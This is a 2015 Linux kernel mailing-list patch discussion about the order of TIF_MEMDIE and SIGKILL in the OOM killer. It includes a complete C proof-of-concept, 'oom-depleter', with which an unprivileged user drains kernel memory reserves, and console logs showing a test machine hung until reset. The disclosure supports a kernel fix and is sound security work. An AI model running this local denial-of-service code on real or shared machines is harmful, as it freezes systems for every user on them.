* [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
From: Tetsuo Handa @ 2015-08-23 7:19 UTC
To: mhocko, rientjes, hannes; +Cc: linux-mm
Quoting from http://www.spinics.net/lists/linux-mm/msg89366.html
> On Mon 01-06-15 22:04:28, Tetsuo Handa wrote:
> > Michal Hocko wrote:
> > > > Likewise, move do_send_sig_info(SIGKILL, victim) to before
> > > > mark_oom_victim(victim) in case for_each_process() takes a very long time,
> > > > for the OOM victim can abuse ALLOC_NO_WATERMARKS through TIF_MEMDIE via e.g.
> > > > memset() in user space until SIGKILL is delivered.
> > >
> > > This is unrelated and I believe even not necessary.
> >
> > Why unnecessary? If a serial console is configured and printing a series of
> > "Kill process %d (%s) sharing same memory" messages takes a few seconds, the OOM
> > victim can consume all memory via malloc() + memset(), can't it?
>
> Can? You are generating one corner case after another, all of them
> without actually showing that they can happen in real life. There are
> a million+1 possible corner cases, yet we would prefer to handle those
> that have a chance of happening in real life. So let's focus on the real
> life scenarios.
>
> > What to do if the OOM victim cannot die immediately after consuming
> > all memory? I think that sending SIGKILL before setting TIF_MEMDIE
> > helps reduce the consumption of memory reserves.
>
> I think that SIGKILL before or after mark_oom_victim has close to zero
> effect. If you think that we should send SIGKILL before looking for
> tasks sharing mm then why not - BUT AGAIN A SEPARATE PATCH WITH A
> JUSTIFICATION please.
I tried to reproduce what I worried about at
http://www.spinics.net/lists/linux-mm/msg82342.html . I confirmed that a
local unprivileged user can consume all of the memory reserves using this time lag.
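(Background for the reproducer below: once TIF_MEMDIE is set, the page
allocator slow path lets the task ignore all watermarks, so every page
fault the victim takes can dip into the memory reserves until SIGKILL
actually terminates it. The following is a simplified sketch of the
relevant gfp_to_alloc_flags() logic in mm/page_alloc.c of kernels from
that era; it is illustrative, not a verbatim quote of the 4.2 source.)

static int gfp_to_alloc_flags(gfp_t gfp_mask)
{
	int alloc_flags = ALLOC_WMARK_MIN | ALLOC_CPUSET;

	/* ... */
	if (likely(!(gfp_mask & __GFP_NOMEMALLOC))) {
		/*
		 * PF_MEMALLOC tasks and TIF_MEMDIE (OOM victim) tasks may
		 * ignore watermarks entirely; this is what oom-depleter
		 * abuses during the TIF_MEMDIE -> SIGKILL window.
		 */
		if (!in_interrupt() &&
		    ((current->flags & PF_MEMALLOC) ||
		     unlikely(test_thread_flag(TIF_MEMDIE))))
			alloc_flags |= ALLOC_NO_WATERMARKS;
	}
	return alloc_flags;
}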
---------- oom-depleter.c start ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int null_fd = EOF;
static char *buf = NULL;
static unsigned long size = 0;

static int dummy(void *unused)
{
	pause();
	return 0;
}

static int trigger(void *unused)
{
	read(null_fd, buf, size); /* Will cause OOM due to overcommit */
	return 0;
}

int main(int argc, char *argv[])
{
	int pipe_fd[2] = { EOF, EOF };
	unsigned long i;
	null_fd = open("/dev/zero", O_RDONLY);
	pipe(pipe_fd);
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	/*
	 * Create many child threads in order to enlarge the time lag between
	 * the moment the OOM killer sets TIF_MEMDIE on the thread group
	 * leader and the moment it sends SIGKILL to that thread.
	 */
	for (i = 0; i < 1000; i++) {
		clone(dummy, malloc(1024) + 1024, CLONE_SIGHAND | CLONE_VM,
		      NULL);
		if (!i)
			close(pipe_fd[1]);
	}
	/* Let a child thread trigger the OOM killer. */
	clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL);
	/* Wait until the first child thread is killed by the OOM killer. */
	read(pipe_fd[0], &i, 1);
	/* Deplete all memory reserves using the time lag. */
	for (i = size; i; i -= 4096)
		buf[i - 1] = 1;
	return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter.c end ----------
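(The reproducer needs no special privileges; it can be built and run as an
ordinary user along the following lines. The exact command line is an
illustration, not part of the original report.)

$ gcc -Wall -o oom-depleter oom-depleter.c
$ ./oom-depleter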
Checked the memory reserves at 38.613801 (timestamps below are kernel log times, in seconds).
Launched oom-depleter at around 40.
The OOM killer was invoked at 48.046321.
The thread group leader got TIF_MEMDIE at 50.064684.
The thread group leader depleted all memory reserves at 50.248677.
The thread group leader received SIGKILL at 52.299532.
The memory reserves had not yet recovered as of 85.966108.
The memory reserves had not yet recovered as of 185.044658.
Gave up waiting and reset the machine at 205.509157.
---------- console log start ----------
[ 38.613801] sysrq: SysRq : Show Memory
[ 38.616506] Mem-Info:
[ 38.618106] active_anon:18185 inactive_anon:2085 isolated_anon:0
[ 38.618106] active_file:10615 inactive_file:18972 isolated_file:0
[ 38.618106] unevictable:0 dirty:7 writeback:0 unstable:0
[ 38.618106] slab_reclaimable:3015 slab_unreclaimable:4217
[ 38.618106] mapped:9940 shmem:2146 pagetables:1319 bounce:0
[ 38.618106] free:378300 free_pcp:486 free_cma:0
[ 38.640475] Node 0 DMA free:9980kB min:400kB low:500kB high:600kB active_anon:2924kB inactive_anon:80kB active_file:816kB inactive_file:896kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:596kB shmem:80kB slab_reclaimable:240kB slab_unreclaimable:308kB kernel_stack:80kB pagetables:64kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 38.655621] lowmem_reserve[]: 0 1731 1731 1731
[ 38.657497] Node 0 DMA32 free:1503220kB min:44652kB low:55812kB high:66976kB active_anon:69816kB inactive_anon:8260kB active_file:41644kB inactive_file:74992kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:28kB writeback:0kB mapped:39164kB shmem:8504kB slab_reclaimable:11820kB slab_unreclaimable:16560kB kernel_stack:3472kB pagetables:5212kB unstable:0kB bounce:0kB free_pcp:1944kB local_pcp:668kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 38.672950] lowmem_reserve[]: 0 0 0 0
[ 38.673726] Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
[ 38.676854] Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
[ 38.680159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 38.681517] 31733 total pagecache pages
[ 38.682162] 0 pages in swap cache
[ 38.682711] Swap cache stats: add 0, delete 0, find 0/0
[ 38.683554] Free swap = 0kB
[ 38.684053] Total swap = 0kB
[ 38.684528] 524157 pages RAM
[ 38.685022] 0 pages HighMem/MovableOnly
[ 38.685645] 76583 pages reserved
[ 38.686173] 0 pages hwpoisoned
[ 48.046321] oom-depleter invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[ 48.047754] oom-depleter cpuset=/ mems_allowed=0
[ 48.048779] CPU: 1 PID: 4797 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[ 48.050612] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[ 48.052434] 0000000000000000 000000004ecba3fc ffff88006c4938d0 ffffffff81614c2f
[ 48.053816] ffff88006c482580 ffff88006c493970 ffffffff81611671 0000000000001000
[ 48.055218] ffff88006c493918 ffffffff8109463c ffff8800784b2b40 ffff88007fc556f8
[ 48.057428] Call Trace:
[ 48.058775] [<ffffffff81614c2f>] dump_stack+0x44/0x55
[ 48.060647] [<ffffffff81611671>] dump_header+0x84/0x21c
[ 48.062591] [<ffffffff8109463c>] ? update_curr+0x9c/0xe0
[ 48.064393] [<ffffffff810917f7>] ? __enqueue_entity+0x67/0x70
[ 48.066506] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[ 48.068633] [<ffffffff81091ee0>] ? pick_next_entity+0xa0/0x150
[ 48.070768] [<ffffffff8110fad4>] oom_kill_process+0x364/0x3d0
[ 48.072874] [<ffffffff81281550>] ? security_capable_noaudit+0x40/0x60
[ 48.074948] [<ffffffff8110fd83>] out_of_memory+0x1f3/0x490
[ 48.076820] [<ffffffff81115214>] __alloc_pages_nodemask+0x904/0x930
[ 48.078885] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[ 48.080781] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[ 48.082936] [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[ 48.084981] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[ 48.086791] [<ffffffff81055f50>] do_page_fault+0x30/0x80
[ 48.088636] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[ 48.090630] [<ffffffff8161c918>] page_fault+0x28/0x30
[ 48.092359] [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[ 48.094065] [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
[ 48.095939] [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[ 48.097690] [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[ 48.099545] [<ffffffff8117b489>] vfs_read+0x79/0x120
[ 48.101129] [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[ 48.102648] [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[ 48.104388] Mem-Info:
[ 48.105396] active_anon:410470 inactive_anon:2085 isolated_anon:0
[ 48.105396] active_file:0 inactive_file:31 isolated_file:0
[ 48.105396] unevictable:0 dirty:0 writeback:0 unstable:0
[ 48.105396] slab_reclaimable:1689 slab_unreclaimable:5719
[ 48.105396] mapped:390 shmem:2146 pagetables:2097 bounce:0
[ 48.105396] free:12966 free_pcp:63 free_cma:0
[ 48.114279] Node 0 DMA free:7308kB min:400kB low:500kB high:600kB active_anon:6764kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[ 48.124147] lowmem_reserve[]: 0 1731 1731 1731
[ 48.125753] Node 0 DMA32 free:44556kB min:44652kB low:55812kB high:66976kB active_anon:1635116kB inactive_anon:8260kB active_file:0kB inactive_file:124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1552kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:252kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1620 all_unreclaimable? yes
[ 48.137007] lowmem_reserve[]: 0 0 0 0
[ 48.138514] Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
[ 48.143010] Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
[ 48.148196] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 48.150810] 2156 total pagecache pages
[ 48.152318] 0 pages in swap cache
[ 48.154200] Swap cache stats: add 0, delete 0, find 0/0
[ 48.156089] Free swap = 0kB
[ 48.157400] Total swap = 0kB
[ 48.158694] 524157 pages RAM
[ 48.160055] 0 pages HighMem/MovableOnly
[ 48.161496] 76583 pages reserved
[ 48.162989] 0 pages hwpoisoned
[ 48.164453] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[ 50.061069] [ 4797] 1000 4797 541715 392157 776 6 0 0 oom-depleter
[ 50.062841] Out of memory: Kill process 3796 (oom-depleter) score 877 or sacrifice child
[ 50.064684] Killed process 3796 (oom-depleter) total-vm:2166860kB, anon-rss:1568628kB, file-rss:0kB
[ 50.066454] Kill process 3797 (oom-depleter) sharing same memory
(...snipped...)
[ 50.247563] Kill process 3939 (oom-depleter) sharing same memory
[ 50.248677] oom-depleter: page allocation failure: order:0, mode:0x280da
[ 50.248679] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[ 50.248680] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[ 50.248682] 0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[ 50.248683] 00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[ 50.248684] ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[ 50.248684] Call Trace:
[ 50.248689] [<ffffffff81614c2f>] dump_stack+0x44/0x55
[ 50.248692] [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[ 50.248693] [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[ 50.248695] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[ 50.248697] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[ 50.248702] [<ffffffff8100d6dc>] ? __switch_to+0x23c/0x470
[ 50.248704] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[ 50.248706] [<ffffffff81055f50>] do_page_fault+0x30/0x80
[ 50.248707] [<ffffffff8161c918>] page_fault+0x28/0x30
[ 50.248708] Mem-Info:
[ 50.248710] active_anon:423405 inactive_anon:2085 isolated_anon:0
[ 50.248710] active_file:7 inactive_file:10 isolated_file:0
[ 50.248710] unevictable:0 dirty:0 writeback:0 unstable:0
[ 50.248710] slab_reclaimable:1689 slab_unreclaimable:5719
[ 50.248710] mapped:393 shmem:2146 pagetables:2097 bounce:0
[ 50.248710] free:0 free_pcp:21 free_cma:0
[ 50.248714] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[ 50.248715] lowmem_reserve[]: 0 1731 1731 1731
[ 50.248717] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 50.248718] lowmem_reserve[]: 0 0 0 0
[ 50.248721] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 50.248723] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 50.248724] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 50.248724] 2149 total pagecache pages
[ 50.248725] 0 pages in swap cache
[ 50.248725] Swap cache stats: add 0, delete 0, find 0/0
[ 50.248725] Free swap = 0kB
[ 50.248726] Total swap = 0kB
[ 50.248726] 524157 pages RAM
[ 50.248726] 0 pages HighMem/MovableOnly
[ 50.248726] 76583 pages reserved
[ 50.248727] 0 pages hwpoisoned
(...snipped...)
[ 50.248940] oom-depleter: page allocation failure: order:0, mode:0x280da
[ 50.248940] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[ 50.248940] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[ 50.248941] 0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[ 50.248942] 00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[ 50.248942] ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[ 50.248942] Call Trace:
[ 50.248943] [<ffffffff81614c2f>] dump_stack+0x44/0x55
[ 50.248944] [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[ 50.248945] [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[ 50.248946] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[ 50.248947] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[ 50.248948] [<ffffffff81110080>] ? pagefault_out_of_memory+0x60/0xb0
[ 50.248949] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[ 50.248950] [<ffffffff81055f50>] do_page_fault+0x30/0x80
[ 50.248951] [<ffffffff8161c918>] page_fault+0x28/0x30
[ 50.248951] Mem-Info:
[ 50.248952] active_anon:423405 inactive_anon:2085 isolated_anon:0
[ 50.248952] active_file:7 inactive_file:10 isolated_file:0
[ 50.248952] unevictable:0 dirty:0 writeback:0 unstable:0
[ 50.248952] slab_reclaimable:1689 slab_unreclaimable:5719
[ 50.248952] mapped:393 shmem:2146 pagetables:2097 bounce:0
[ 50.248952] free:0 free_pcp:21 free_cma:0
[ 50.248954] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[ 50.248955] lowmem_reserve[]: 0 1731 1731 1731
[ 50.248957] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 50.248957] lowmem_reserve[]: 0 0 0 0
[ 50.248959] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 50.248961] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 50.248961] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 50.248962] 2149 total pagecache pages
[ 50.248962] 0 pages in swap cache
[ 50.248962] Swap cache stats: add 0, delete 0, find 0/0
[ 50.248962] Free swap = 0kB
[ 50.248962] Total swap = 0kB
[ 50.248963] 524157 pages RAM
[ 50.248963] 0 pages HighMem/MovableOnly
[ 50.248963] 76583 pages reserved
[ 50.248963] 0 pages hwpoisoned
[ 51.212857] Kill process 3940 (oom-depleter) sharing same memory
(...snipped...)
[ 52.299532] Kill process 4797 (oom-depleter) sharing same memory
[ 85.966108] sysrq: SysRq : Show Memory
[ 85.967079] Mem-Info:
[ 85.967643] active_anon:423788 inactive_anon:2085 isolated_anon:0
[ 85.967643] active_file:0 inactive_file:1 isolated_file:0
[ 85.967643] unevictable:0 dirty:0 writeback:0 unstable:0
[ 85.967643] slab_reclaimable:1689 slab_unreclaimable:5401
[ 85.967643] mapped:391 shmem:2146 pagetables:2123 bounce:0
[ 85.967643] free:4 free_pcp:0 free_cma:0
[ 85.974400] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[ 85.983232] lowmem_reserve[]: 0 1731 1731 1731
[ 85.984550] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 85.994326] lowmem_reserve[]: 0 0 0 0
[ 85.995638] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 85.998389] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[ 86.001506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 86.003604] 2147 total pagecache pages
[ 86.004878] 0 pages in swap cache
[ 86.006083] Swap cache stats: add 0, delete 0, find 0/0
[ 86.007638] Free swap = 0kB
[ 86.008793] Total swap = 0kB
[ 86.009941] 524157 pages RAM
[ 86.011089] 0 pages HighMem/MovableOnly
[ 86.012413] 76583 pages reserved
[ 86.013632] 0 pages hwpoisoned
[ 125.269135] sysrq: SysRq : Show State
[ 125.270536] task PC stack pid father
[ 125.272269] systemd S ffff88007cc07a08 0 1 0 0x00000000
[ 125.274343] ffff88007cc07a08 ffff88007cc08000 ffff88007cc08000 ffff88007cc07a40
[ 125.276505] ffff88007fc0db00 00000000fffd55be ffff88007fffc000 ffff88007cc07a20
[ 125.278661] ffffffff8161793e ffff88007fc0db00 ffff88007cc07aa8 ffffffff81619fcd
[ 125.280844] Call Trace:
[ 125.282076] [<ffffffff8161793e>] schedule+0x2e/0x70
[ 125.283698] [<ffffffff81619fcd>] schedule_timeout+0x11d/0x1c0
[ 125.285481] [<ffffffff810be7c0>] ? cascade+0x90/0x90
[ 125.287131] [<ffffffff8111caef>] ? pfmemalloc_watermark_ok+0xaf/0xe0
[ 125.289038] [<ffffffff8111ccee>] throttle_direct_reclaim+0x1ce/0x240
[ 125.290955] [<ffffffff810a0870>] ? wait_woken+0x80/0x80
[ 125.292676] [<ffffffff81120bd0>] try_to_free_pages+0x80/0xc0
[ 125.294478] [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[ 125.296401] [<ffffffff8110cb07>] ? __page_cache_alloc+0x97/0xb0
[ 125.298283] [<ffffffff8115576c>] alloc_pages_current+0x8c/0x100
[ 125.300141] [<ffffffff8110cb07>] __page_cache_alloc+0x97/0xb0
[ 125.301977] [<ffffffff8110e728>] filemap_fault+0x218/0x490
[ 125.303759] [<ffffffff81237c79>] xfs_filemap_fault+0x39/0x60
[ 125.305576] [<ffffffff81132e69>] __do_fault+0x49/0xf0
[ 125.307273] [<ffffffff8113809f>] handle_mm_fault+0xe7f/0x1960
[ 125.309100] [<ffffffff811bac6e>] ? ep_scan_ready_list.isra.12+0x19e/0x1c0
[ 125.311114] [<ffffffff811badce>] ? ep_poll+0x11e/0x320
[ 125.312841] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[ 125.314643] [<ffffffff81055f50>] do_page_fault+0x30/0x80
[ 125.316363] [<ffffffff8161c918>] page_fault+0x28/0x30
(...snipped...)
[ 130.699717] oom-depleter x ffff88007c06bc28 0 3797 1 0x00000086
[ 130.701724] ffff88007c06bc28 ffff88007a623e80 ffff88007c06c000 ffff88007a6241d0
[ 130.703703] ffff88007c6373e8 ffff88007a623e80 ffff88007cc08000 ffff88007c06bc40
[ 130.705678] ffffffff8161793e ffff88007a624450 ffff88007c06bcb0 ffffffff8106b0d7
[ 130.707654] Call Trace:
[ 130.708632] [<ffffffff8161793e>] schedule+0x2e/0x70
[ 130.710064] [<ffffffff8106b0d7>] do_exit+0x677/0xae0
[ 130.711535] [<ffffffff8106b5ba>] do_group_exit+0x3a/0xb0
[ 130.713037] [<ffffffff81074d4f>] get_signal+0x17f/0x540
[ 130.714537] [<ffffffff8100e302>] do_signal+0x32/0x650
[ 130.715991] [<ffffffff81099ffc>] ? load_balance+0x1bc/0x8b0
[ 130.717545] [<ffffffff8100362d>] prepare_exit_to_usermode+0x9d/0xf0
[ 130.719275] [<ffffffff81003753>] syscall_return_slowpath+0xd3/0x1d0
[ 130.720973] [<ffffffff816173a4>] ? __schedule+0x274/0x7e0
[ 130.722536] [<ffffffff8161793e>] ? schedule+0x2e/0x70
[ 130.723989] [<ffffffff8161af4c>] int_ret_from_sys_call+0x25/0x8f
(...snipped...)
[ 157.243284] oom-depleter R running task 0 4797 1 0x00000084
[ 157.245131] ffff88006c482580 000000004ecba3fc ffff88007fc83c38 ffffffff8108d14a
[ 157.247105] ffff88006c482580 ffff88006c4827c0 ffff88007fc83c78 ffffffff8108d23d
[ 157.249092] ffff88006c482970 000000004ecba3fc ffffffff8188b780 0000000000000074
[ 157.251054] Call Trace:
[ 157.252018] <IRQ> [<ffffffff8108d14a>] sched_show_task+0xaa/0x110
[ 157.253740] [<ffffffff8108d23d>] show_state_filter+0x8d/0xc0
[ 157.255258] [<ffffffff813cd31b>] sysrq_handle_showstate+0xb/0x20
[ 157.256898] [<ffffffff813cda24>] __handle_sysrq+0xf4/0x150
[ 157.258442] [<ffffffff813cde10>] sysrq_filter+0x360/0x3a0
[ 157.259974] [<ffffffff81497c12>] input_to_handler+0x52/0x100
[ 157.261552] [<ffffffff81499797>] input_pass_values.part.5+0x167/0x180
[ 157.263270] [<ffffffff81499afb>] input_handle_event+0xfb/0x4f0
[ 157.264875] [<ffffffff81499f3e>] input_event+0x4e/0x70
[ 157.266366] [<ffffffff814a18eb>] atkbd_interrupt+0x5bb/0x6a0
[ 157.267929] [<ffffffff81495101>] serio_interrupt+0x41/0x80
[ 157.269457] [<ffffffff81495d7a>] i8042_interrupt+0x1da/0x3a0
[ 157.271017] [<ffffffff810b0d3b>] handle_irq_event_percpu+0x2b/0x100
[ 157.272678] [<ffffffff810b0e4a>] handle_irq_event+0x3a/0x60
[ 157.274224] [<ffffffff810b3cb6>] handle_edge_irq+0xa6/0x140
[ 157.275759] [<ffffffff81010ad9>] handle_irq+0x19/0x30
[ 157.277187] [<ffffffff81010478>] do_IRQ+0x48/0xd0
[ 157.278563] [<ffffffff8161b8c7>] common_interrupt+0x87/0x87
[ 157.280091] <EOI> [<ffffffff810a2eb9>] ? native_queued_spin_lock_slowpath+0x19/0x180
[ 157.282070] [<ffffffff8161a95c>] _raw_spin_lock+0x1c/0x20
[ 157.283597] [<ffffffff81130bcd>] __list_lru_count_one.isra.4+0x1d/0x50
[ 157.285316] [<ffffffff81130c1e>] list_lru_count_one+0x1e/0x20
[ 157.286898] [<ffffffff8117d610>] super_cache_count+0x50/0xd0
[ 157.288477] [<ffffffff8111d1d4>] shrink_slab.part.41+0xf4/0x280
[ 157.290087] [<ffffffff81120510>] shrink_zone+0x2c0/0x2d0
[ 157.291595] [<ffffffff81120894>] do_try_to_free_pages+0x164/0x420
[ 157.293242] [<ffffffff81120be4>] try_to_free_pages+0x94/0xc0
[ 157.294799] [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[ 157.296474] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[ 157.298019] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[ 157.299606] [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[ 157.301131] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[ 157.302676] [<ffffffff81055f50>] do_page_fault+0x30/0x80
[ 157.304169] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[ 157.305737] [<ffffffff8161c918>] page_fault+0x28/0x30
[ 157.307186] [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[ 157.308699] [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
